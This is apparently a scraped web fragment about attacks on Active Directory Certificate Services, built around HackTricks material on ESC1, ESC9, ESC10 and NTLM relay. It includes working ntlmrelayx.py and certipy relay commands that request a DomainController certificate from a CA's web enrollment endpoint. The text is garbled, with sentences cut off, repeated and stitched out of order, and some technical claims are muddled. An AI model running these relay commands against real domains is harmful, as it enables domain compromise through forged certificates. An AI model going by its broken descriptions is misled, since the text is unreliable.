Hacktricks Adcs 2021 -

: Obtain a certificate for the relayed account (e.g., a computer account, domain admin). ESC9 – No Security Extension in Template Condition : Certificate template has CT_FLAG_NO_SECURITY_EXTENSION , which bypasses permissions on the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT .

# Relay NTLM auth from a compromised host to ADCS ntlmrelayx.py -t http://ca.contoso.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController certipy relay -target http://ca.contoso.com -template DomainController hacktricks adcs

: Modify template to enable ESC1 conditions (e.g., allow SAN supply), then request as ESC1. : Obtain a certificate for the relayed account (e

: Similar to ESC1, request a certificate for any user. ESC10 – Weak Authentication on CA Condition : CA’s authentication strength is set to low (e.g., Windows Integrated Auth without any additional protection). a computer account